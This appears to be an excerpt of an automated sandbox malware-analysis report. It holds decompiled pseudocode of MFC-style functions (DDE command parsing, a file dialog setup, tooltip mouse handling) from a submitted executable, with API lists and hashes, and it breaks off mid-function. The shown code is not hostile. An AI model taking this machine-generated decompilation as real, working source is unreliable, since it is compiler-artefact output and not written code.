                  						_t204 = E00427A29(_t378, _t475 - 0x18, 0xa);
                  						 *((char*)(_t475 - 4)) = 6;
                  						_t205 = E00409F00(_t204, _t465, "[printto(\"");
                  						asm("sbb bl, bl");
                  						_t361 =  ~_t205 + 1;
                  						 *((char*)(_t475 - 4)) = 1;
                  						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
                  						__eflags =  ~_t205 + 1;
                  						if( ~_t205 + 1 == 0) {
                  							L33:
                  							 *((char*)(_t475 - 4)) = 0;
                  							E004157B0(_t475 - 0x44, _t465);
                  							E004010B0( *((intOrPtr*)(_t475 + 8)) + 0xfffffff0, _t465);
                  							_t209 = 0;
                  							__eflags = 0;
                  							L34:
                  							return E00431B73(_t209);
                  						}
                  						 *((intOrPtr*)(_t475 - 0x30)) = 3;
                  						__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff6;
                  						_t215 = E004279E1(_t475 + 8, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff6);
                  						 *((char*)(_t475 - 4)) = 7;
                  						L6:
                  						E004056C2(_t361, _t475 + 8, _t215);
                  						 *((char*)(_t475 - 4)) = 1;
                  						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
                  						_t469 = E0042784A(_t475 + 8, 0x22, 0);
                  						_t478 = _t469 - 0xffffffff;
                  						if(_t469 == 0xffffffff) {
                  							goto L33;
                  						}
                  						_t220 = E00427A29(_t475 + 8, _t475 - 0x18, _t469);
                  						 *((char*)(_t475 - 4)) = 8;
                  						E004056C2(_t361, _t475 - 0x2c, _t220);
                  						 *((char*)(_t475 - 4)) = 1;
                  						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
                  						_t227 = E004279E1(_t475 + 8, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t469);
                  						 *((char*)(_t475 - 4)) = 9;
                  						E004056C2(_t361, _t475 + 8, _t227);
                  						 *((char*)(_t475 - 4)) = 1;
                  						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
                  						 *((intOrPtr*)(_t475 - 0x18)) = 0;
                  						 *((intOrPtr*)(_t475 - 0x10)) = 1;
                  						_t231 =  *((intOrPtr*)(E0041F363(1, 0, _t469, _t478) + 4));
                  						_t479 =  *((intOrPtr*)(_t231 + 0x8c));
                  						if( *((intOrPtr*)(_t231 + 0x8c)) == 0) {
                  							 *((intOrPtr*)(_t475 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, __eflags) + 4)) + 0x8c));
                  						} else {
                  							_t469 =  *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4));
                  							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4)) + 0x4c)) =  *((intOrPtr*)(_t469 + 0x8c));
                  							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4)) + 0x8c)) = _t475 - 0x44;
                  						}
                  						_t480 =  *((intOrPtr*)(_t475 - 0x30)) - 1;
                  						if( *((intOrPtr*)(_t475 - 0x30)) != 1) {
                  							__eflags =  *((intOrPtr*)(_t475 - 0x30)) - 3;
                  							if( *((intOrPtr*)(_t475 - 0x30)) != 3) {
                  								L28:
                  								_t470 = E004274AF( *((intOrPtr*)(_t475 - 0x14)));
                  								_t236 = E0041F363(1, 0, _t470, __eflags);
                  								_t465 =  *((intOrPtr*)( *((intOrPtr*)(_t236 + 4))));
                  								_t366 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t236 + 4)))) + 0x88))( *((intOrPtr*)(_t475 - 0x2c)));
                  								 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x8c)) = _t475 - 0x44;
                  								SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x20)) + 0x20), 0x111, 0xe108, 0);
                  								 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x8c)) = 0;
                  								_t247 = E004274AF( *((intOrPtr*)(_t475 - 0x14)));
                  								__eflags = _t247 - _t470;
                  								if(_t247 > _t470) {
                  									 *((intOrPtr*)( *_t366 + 0x7c))();
                  								}
                  								__eflags = E00423E24();
                  								if(__eflags == 0) {
                  									PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x20)) + 0x20), 0x10, 0, 0);
                  								}
                  								goto L32;
                  							}
                  							_t260 = E00427A29(_t475 + 8, _t475 - 0x1c, 3);
                  							_t470 = 0x4542a8;
                  							_t261 = E0042787D(_t260, 0x4542a8);
                  							_t366 = _t261;
                  							E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  							__eflags = _t261;
                  							if(__eflags == 0) {
                  								_t267 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
                  								 *((char*)(_t475 - 4)) = 0xa;
                  								E004056C2(_t366, _t475 + 8, _t267);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t270 = E0042784A(_t475 + 8, 0x22, 0);
                  								_t366 = _t270;
                  								__eflags = _t270 - 0xffffffff;
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								_t272 = E00427A29(_t475 + 8, _t475 - 0x1c, _t366);
                  								 *((char*)(_t475 - 4)) = 0xb;
                  								E004056C2(_t366, _t475 - 0x28, _t272);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t279 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t366);
                  								 *((char*)(_t475 - 4)) = 0xc;
                  								E004056C2(_t366, _t475 + 8, _t279);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t284 = E0042787D(E00427A29(_t475 + 8, _t475 - 0x1c, 3), 0x4542a8);
                  								_t366 = _t284;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								__eflags = _t284;
                  								if(__eflags != 0) {
                  									goto L21;
                  								}
                  								_t290 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
                  								 *((char*)(_t475 - 4)) = 0xd;
                  								E004056C2(_t366, _t475 + 8, _t290);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t293 = E0042784A(_t475 + 8, 0x22, 0);
                  								_t366 = _t293;
                  								__eflags = _t293 - 0xffffffff;
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								_t295 = E00427A29(_t475 + 8, _t475 - 0x1c, _t366);
                  								 *((char*)(_t475 - 4)) = 0xe;
                  								E004056C2(_t366, _t475 - 0x24, _t295);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t302 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t366);
                  								 *((char*)(_t475 - 4)) = 0xf;
                  								E004056C2(_t366, _t475 + 8, _t302);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t307 = E0042787D(E00427A29(_t475 + 8, _t475 - 0x1c, 3), 0x4542a8);
                  								_t366 = _t307;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								__eflags = _t307;
                  								if(__eflags != 0) {
                  									goto L21;
                  								}
                  								_t313 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
                  								 *((char*)(_t475 - 4)) = 0x10;
                  								E004056C2(_t366, _t475 + 8, _t313);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t316 = E0042784A(_t475 + 8, 0x22, 0);
                  								_t470 = _t316;
                  								__eflags = _t316 - 0xffffffff;
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								_t318 = E00427A29(_t475 + 8, _t475 - 0x1c, _t470);
                  								 *((char*)(_t475 - 4)) = 0x11;
                  								E004056C2(_t366, _t475 - 0x20, _t318);
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								_t325 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t470);
                  								 *((char*)(_t475 - 4)) = 0x12;
                  								E004056C2(_t366, _t475 + 8, _t325);
                  								__eflags =  *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0;
                  								 *((char*)(_t475 - 4)) = 1;
                  								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
                  								goto L28;
                  							}
                  							L21:
                  							 *((intOrPtr*)(_t475 - 0x10)) = 0;
                  							goto L32;
                  						} else {
                  							_t366 =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t480) + 4)) + 0x20));
                  							_t471 =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t469, _t480) + 4)) + 0x4c));
                  							if(_t471 == 0xffffffff || _t471 == 1) {
                  								_t332 = IsIconic( *(_t366 + 0x20));
                  								asm("sbb esi, esi");
                  								_t470 = ( ~_t332 & 0x00000004) + 5;
                  							}
                  							E00412C34(_t366, _t470);
                  							_t484 = _t470 - 6;
                  							if(_t470 != 6) {
                  								SetForegroundWindow( *(_t366 + 0x20));
                  							}
                  							_t335 =  *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t484) + 4));
                  							_t465 =  *_t335;
                  							_t462 = _t335;
                  							 *((intOrPtr*)( *_t335 + 0x88))( *((intOrPtr*)(_t475 - 0x2c)));
                  							_t337 = E00423E24();
                  							_t485 = _t337;
                  							if(_t337 == 0) {
                  								E00423E10(_t462, 1);
                  							}
                  							 *( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x4c) =  *( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x4c) | 0xffffffff;
                  							L32:
                  							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x8c)) =  *((intOrPtr*)(_t475 - 0x18));
                  							 *((char*)(_t475 - 4)) = 0;
                  							E004157B0(_t475 - 0x44, _t465);
                  							E004010B0( *((intOrPtr*)(_t475 + 8)) + 0xfffffff0, _t465);
                  							_t209 =  *((intOrPtr*)(_t475 - 0x10));
                  							goto L34;
                  						}
                  					}
                  					 *((intOrPtr*)(_t475 - 0x30)) = 2;
                  					_t215 = E004279E1(_t378, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff8);
                  					 *((char*)(_t475 - 4)) = 5;
                  					goto L6;
                  				}
                  				 *((intOrPtr*)(_t475 - 0x30)) = 1;
                  				_t215 = E004279E1(_t374, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff9);
                  				 *((char*)(_t475 - 4)) = 3;
                  				goto L6;
                  			}











































                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427FDC
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • IsIconic.USER32 ref: 00428224
                  • SetForegroundWindow.USER32(?,-00000005,?,?,?,?,?,?,?,?,?,?,00000007,?,00000038), ref: 00428246
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00428546
                  • PostMessageA.USER32 ref: 00428588
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Message$ForegroundIconicPostSendWindow
                  • String ID: ","$[open("$[print("$[printto("
                  • API String ID: 2890980707-3790869113
                  • Opcode ID: 346ce8cee2bd3e896c27535d90984726f0a43def55bf19995bbae6884d5c5d6f
                  • Instruction ID: 10cd29f604f9e594cf7a41b93c8c31365955eb4dae2b5264998e721e2426469d
                  • Opcode Fuzzy Hash: 346ce8cee2bd3e896c27535d90984726f0a43def55bf19995bbae6884d5c5d6f
                  • Instruction Fuzzy Hash: DE12C630A00158EFCB04EBA5C895FEE7BB4AF04318F04825EB9556B3D2DF789A45CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E0042B11B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t87;
                  				signed int _t89;
                  				void* _t99;
                  				intOrPtr _t101;
                  				void* _t104;
                  				intOrPtr* _t105;
                  				void* _t106;
                  				intOrPtr* _t107;
                  				char* _t114;
                  				intOrPtr _t115;
                  				signed int _t119;
                  				void* _t126;
                  				char* _t127;
                  				signed char _t128;
                  				intOrPtr _t146;
                  				void* _t147;
                  				void* _t148;
                  				signed int _t157;
                  
                  				_t143 = __edi;
                  				_t136 = __edx;
                  				_push(0xac);
                  				E00431B04(E0044C739, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t147 - 0xb0)) =  *((intOrPtr*)(_t147 + 0x10));
                  				 *((intOrPtr*)(_t147 - 0xac)) =  *((intOrPtr*)(_t147 + 0x18));
                  				_t146 = __ecx;
                  				 *((intOrPtr*)(_t147 - 0xb8)) = __ecx;
                  				E0042A1E2(__ecx,  *((intOrPtr*)(_t147 + 0x1c)));
                  				 *((intOrPtr*)(_t147 - 4)) = 0;
                  				 *((intOrPtr*)(__ecx)) = 0x4547f4;
                  				E004014C0(__ecx + 0x8c, __edx);
                  				 *((intOrPtr*)(_t146 + 0x1d8)) = 0;
                  				 *((char*)(_t147 - 4)) = 1;
                  				 *((intOrPtr*)(_t146 + 0x1dc)) = 0;
                  				if( *((intOrPtr*)(_t147 + 0x20)) == 0) {
                  					_t143 = 0x94;
                  					E00431160(0x94, _t147 - 0xa4, 0, 0x94);
                  					_t148 = _t148 + 0xc;
                  					 *(_t147 - 0xa4) = 0x94;
                  					_t119 = GetVersionExA(_t147 - 0xa4);
                  					 *((intOrPtr*)(_t147 + 0x20)) = 0x58;
                  					asm("sbb eax, eax");
                  					 *(_t146 + 0x78) =  !_t119 &  *(_t147 + 0x24);
                  				}
                  				_t87 = E0043108C(0, _t136, _t143,  *((intOrPtr*)(_t147 + 0x20)));
                  				_pop(_t126);
                  				 *((intOrPtr*)(_t146 + 0x74)) = _t87;
                  				_t155 = _t87;
                  				if(_t87 == 0) {
                  					_t87 = E004063FE(0, _t126, _t143, _t146, _t155);
                  				}
                  				E00431160(_t143, _t87, 0,  *((intOrPtr*)(_t147 + 0x20)));
                  				_t89 =  *(_t147 + 8);
                  				 *(_t146 + 0x88) = _t89;
                  				asm("sbb eax, eax");
                  				 *((intOrPtr*)(_t146 + 0x54)) =  ~_t89 + 0x7005;
                  				 *((intOrPtr*)(_t146 + 0x1d4)) = 0;
                  				_t127 = _t146 + 0x90;
                  				 *_t127 = 0;
                  				_t144 = _t146 + 0xd0;
                  				 *_t144 = 0;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)))) =  *((intOrPtr*)(_t147 + 0x20));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x1c)) = _t144;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x20)) = 0x104;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t147 + 0xc));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x24)) = _t127;
                  				_t128 = 0x40;
                  				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x28) = _t128;
                  				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) |  *(_t147 + 0x14) | 0x00080020;
                  				if(( *(_t147 + 0x14) & _t128) != 0) {
                  					_t115 =  *((intOrPtr*)(_t146 + 0x74));
                  					_t50 = _t115 + 0x34;
                  					 *_t50 =  *(_t115 + 0x34) & 0xff7fffff;
                  					_t157 =  *_t50;
                  				}
                  				_t99 = E0041F363(0, _t144, _t146, _t157);
                  				_t129 =  *((intOrPtr*)(_t146 + 0x74));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 8)) =  *((intOrPtr*)(_t99 + 0xc));
                  				_t101 =  *((intOrPtr*)(_t146 + 0x74));
                  				 *((intOrPtr*)(_t101 + 0x44)) = E0042A570;
                  				if( *((intOrPtr*)(_t147 - 0xb0)) != 0) {
                  					_t101 = E004048ED(0, _t129, _t144, _t146, _t144, 0x104,  *((intOrPtr*)(_t147 - 0xb0)), 0xffffffff);
                  				}
                  				if( *((intOrPtr*)(_t147 - 0xac)) != 0) {
                  					_t144 = _t146 + 0x8c;
                  					E00402CA0(_t146 + 0x8c, _t146,  *((intOrPtr*)(_t147 - 0xac)));
                  					_t113 = E004014F0(_t146 + 0x8c, 0);
                  					while(1) {
                  						_t114 = E004334ED(_t113, 0x7c);
                  						if(_t114 == 0) {
                  							break;
                  						}
                  						 *_t114 = 0;
                  						_t113 = _t114 + 1;
                  						__eflags = _t114 + 1;
                  					}
                  					_t101 =  *((intOrPtr*)(_t146 + 0x74));
                  					 *((intOrPtr*)(_t101 + 0xc)) =  *((intOrPtr*)(_t146 + 0x8c));
                  				}
                  				if( *(_t146 + 0x78) == 1) {
                  					__imp__CoInitializeEx(0, 2);
                  					if(_t101 < 0) {
                  						L23:
                  						 *(_t146 + 0x78) = 0;
                  					} else {
                  						_t104 = _t147 - 0xa8;
                  						_push(_t104);
                  						_push(0x454974);
                  						_t144 = _t146 + 0x1d8;
                  						_push(1);
                  						 *_t144 = 0x4547a0;
                  						 *((intOrPtr*)(_t146 + 0x1dc)) = 0x4547d0;
                  						_push(0);
                  						if( *(_t146 + 0x88) == 0) {
                  							_push(0x463168);
                  						} else {
                  							_push(0x463158);
                  						}
                  						__imp__CoCreateInstance();
                  						if(_t104 < 0) {
                  							goto L23;
                  						} else {
                  							_t105 =  *((intOrPtr*)(_t147 - 0xa8));
                  							_t130 =  *_t105;
                  							_t106 =  *((intOrPtr*)( *_t105))(_t105, 0x454764, _t147 - 0xb4);
                  							_t165 = _t106;
                  							if(_t106 < 0) {
                  								L20:
                  								E00406436(0, _t130, _t144, _t146, _t165);
                  							}
                  							_t107 =  *((intOrPtr*)(_t147 - 0xa8));
                  							_t130 =  *_t107;
                  							_push(_t146 + 0x7c);
                  							_push(_t144);
                  							_push(_t107);
                  							if( *((intOrPtr*)( *_t107 + 0x1c))() < 0) {
                  								goto L20;
                  							}
                  							 *((intOrPtr*)(_t146 + 0x80)) =  *((intOrPtr*)(_t147 - 0xa8));
                  							 *((intOrPtr*)(_t146 + 0x84)) =  *((intOrPtr*)(_t147 - 0xb4));
                  						}
                  					}
                  				}
                  				return E00431B87(0, _t144, _t146);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042B125
                  • _memset.LIBCMT ref: 0042B186
                  • GetVersionExA.KERNEL32(?), ref: 0042B19B
                  • _malloc.LIBCMT ref: 0042B1BC
                  • _memset.LIBCMT ref: 0042B1D3
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0042B2D9
                  • CoCreateInstance.OLE32(00463168,00000000), ref: 0042B320
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset$CreateException@8H_prolog3H_prolog3_InitializeInstanceThrowVersion_malloc
                  • String ID: X
                  • API String ID: 4031887728-3081909835
                  • Opcode ID: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction ID: 5172e0a2d860184040d2a6c4a60c16d353be7440ddfd1ca1bccc4f22e79cac10
                  • Opcode Fuzzy Hash: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction Fuzzy Hash: 9A7168B4600755DFDB20DF25C880B9ABBE0FF49308F4045AEE9999B361D738A984CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00421E22(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				signed int _v20;
                  				struct tagPOINT _v28;
                  				intOrPtr _v40;
                  				signed int _v72;
                  				char _v76;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t60;
                  				signed int _t62;
                  				signed int _t63;
                  				signed int _t67;
                  				signed int _t70;
                  				intOrPtr _t72;
                  				signed int _t79;
                  				short _t80;
                  				short _t87;
                  				short _t92;
                  				intOrPtr _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t116;
                  				intOrPtr* _t118;
                  
                  				_t115 = _a4;
                  				_t118 = __ecx;
                  				if(E0040CD15(__ecx, __eflags, _t115) == 0) {
                  					_t116 =  *((intOrPtr*)(_t115 + 4));
                  					_push(__ebx);
                  					_t100 = __ecx;
                  					_t60 = E00410293(__ecx);
                  					__eflags =  *(__ecx + 0x84) & 0x00000020;
                  					_v20 = _t60;
                  					if(( *(__ecx + 0x84) & 0x00000020) != 0) {
                  						L5:
                  						__eflags = _t116 - 0x200;
                  						if(_t116 < 0x200) {
                  							L7:
                  							__eflags = _t116 - 0xa0 - 9;
                  							if(__eflags > 0) {
                  								L30:
                  								_t62 = E0040F8D7(_t118);
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L32:
                  									__eflags = _v20;
                  									if(_v20 == 0) {
                  										L35:
                  										_t63 = IsWindow( *(_t118 + 0x20));
                  										__eflags = _t63;
                  										if(_t63 == 0) {
                  											L37:
                  											__eflags = 0;
                  											return 0;
                  										}
                  										return E0040D369(_a4);
                  									} else {
                  										goto L33;
                  									}
                  									while(1) {
                  										L33:
                  										_t117 = _v20;
                  										_t67 =  *((intOrPtr*)( *_v20 + 0x108))(_a4);
                  										__eflags = _t67;
                  										if(_t67 != 0) {
                  											goto L1;
                  										}
                  										_t70 = E0040F898(_t117);
                  										_v20 = _t70;
                  										__eflags = _t70;
                  										if(_t70 != 0) {
                  											continue;
                  										}
                  										goto L35;
                  									}
                  									goto L1;
                  								}
                  								__eflags =  *(_t62 + 0x68);
                  								if( *(_t62 + 0x68) != 0) {
                  									goto L37;
                  								}
                  								goto L32;
                  							}
                  							L8:
                  							_v16 = E0041F396(0x201, _t100, _t116, _t118, __eflags);
                  							_t72 = _a4;
                  							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
                  							_v28.x =  *(_t72 + 0x14);
                  							ScreenToClient( *(_t118 + 0x20),  &_v28);
                  							E00431160(_t116,  &_v76, 0, 0x2c);
                  							_v76 = 0x30;
                  							_t79 =  *((intOrPtr*)( *_t118 + 0x74))(_v28.x, _v28.y,  &_v76);
                  							__eflags = _v40 - 0xffffffff;
                  							_v8 = _t79;
                  							if(__eflags != 0) {
                  								_push(_v40);
                  								E004316F6(0x201, _t116, _t118, __eflags);
                  							}
                  							__eflags = _t116 - 0x201;
                  							if(_t116 != 0x201) {
                  								L13:
                  								_v12 = _v12 & 0x00000000;
                  								__eflags = _t116 - 0x201;
                  								if(_t116 != 0x201) {
                  									_t92 = GetKeyState(1);
                  									__eflags = _t92;
                  									if(_t92 < 0) {
                  										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
                  									}
                  								}
                  								L16:
                  								__eflags = _v8;
                  								if(_v8 < 0) {
                  									L26:
                  									_t80 = GetKeyState(1);
                  									__eflags = _t80;
                  									if(_t80 >= 0) {
                  										L28:
                  										 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
                  										KillTimer( *(_t118 + 0x20), 0xe001);
                  										L29:
                  										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
                  										goto L30;
                  									}
                  									__eflags = _v12;
                  									if(_v12 == 0) {
                  										goto L29;
                  									}
                  									goto L28;
                  								}
                  								__eflags = _v12;
                  								if(_v12 != 0) {
                  									goto L26;
                  								}
                  								__eflags = _t116 - 0x202;
                  								if(_t116 != 0x202) {
                  									__eflags =  *(_t118 + 0x80) & 0x00000008;
                  									if(( *(_t118 + 0x80) & 0x00000008) != 0) {
                  										L25:
                  										 *((intOrPtr*)( *_t118 + 0x178))(_v8);
                  										goto L29;
                  									}
                  									_t87 = GetKeyState(1);
                  									__eflags = _t87;
                  									if(_t87 < 0) {
                  										goto L25;
                  									}
                  									_t111 = _v16;
                  									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
                  									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
                  										goto L29;
                  									}
                  									_push(0x12c);
                  									_push(0xe000);
                  									L20:
                  									E0042124D(_t118);
                  									goto L29;
                  								}
                  								 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
                  								_push(0xc8);
                  								_push(0xe001);
                  								goto L20;
                  							}
                  							__eflags = _v72 & 0x80000000;
                  							if((_v72 & 0x80000000) == 0) {
                  								goto L13;
                  							}
                  							_v12 = 1;
                  							goto L16;
                  						}
                  						__eflags = _t116 - 0x209;
                  						if(__eflags <= 0) {
                  							goto L8;
                  						}
                  						goto L7;
                  					}
                  					__eflags = _t116 - 0x201;
                  					if(_t116 == 0x201) {
                  						goto L5;
                  					}
                  					__eflags = _t116 - 0x202;
                  					if(_t116 != 0x202) {
                  						goto L30;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				return 1;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientScreenWindow_memset
                  • String ID: 0
                  • API String ID: 1268500159-4108050209
                  • Opcode ID: 81379cf26b52d18687ae8a87a0efbcf3c5d5b7e6def768ce166db48b00316175
                  • Instruction ID: 4c652db0de8b7d6beb0a25977988bbef7d9d9a37af492f7cdf9cd22247f081bd
                  • Opcode Fuzzy Hash: 81379cf26b52d18687ae8a87a0efbcf3c5d5b7e6def768ce166db48b00316175
                  • Instruction Fuzzy Hash: 0851D631B00214EFDF20DFA4D948BAE7BB1BF14304F51016AE925A72E1DB799E81CB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00429112(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				CHAR* _t45;
                  				long _t46;
                  				CHAR* _t50;
                  				long _t55;
                  				void* _t57;
                  				int _t63;
                  				long _t73;
                  				void* _t86;
                  				void* _t89;
                  				CHAR* _t91;
                  				void* _t94;
                  				CHAR* _t99;
                  				CHAR* _t101;
                  
                  				_t92 = __esi;
                  				_t89 = __edx;
                  				_push(0x158);
                  				E00431B04(E0044C60B, __ebx, __edi, __esi);
                  				_t91 =  *(_t94 + 8);
                  				_t45 =  *(_t94 + 0xc);
                  				_t73 =  *(_t94 + 0x10);
                  				_t99 = _t91;
                  				_t75 = 0 | _t99 != 0x00000000;
                  				 *(_t94 - 0x158) = _t45;
                  				_t100 = _t99 != 0;
                  				if(_t99 != 0) {
                  					L2:
                  					_t101 = _t45;
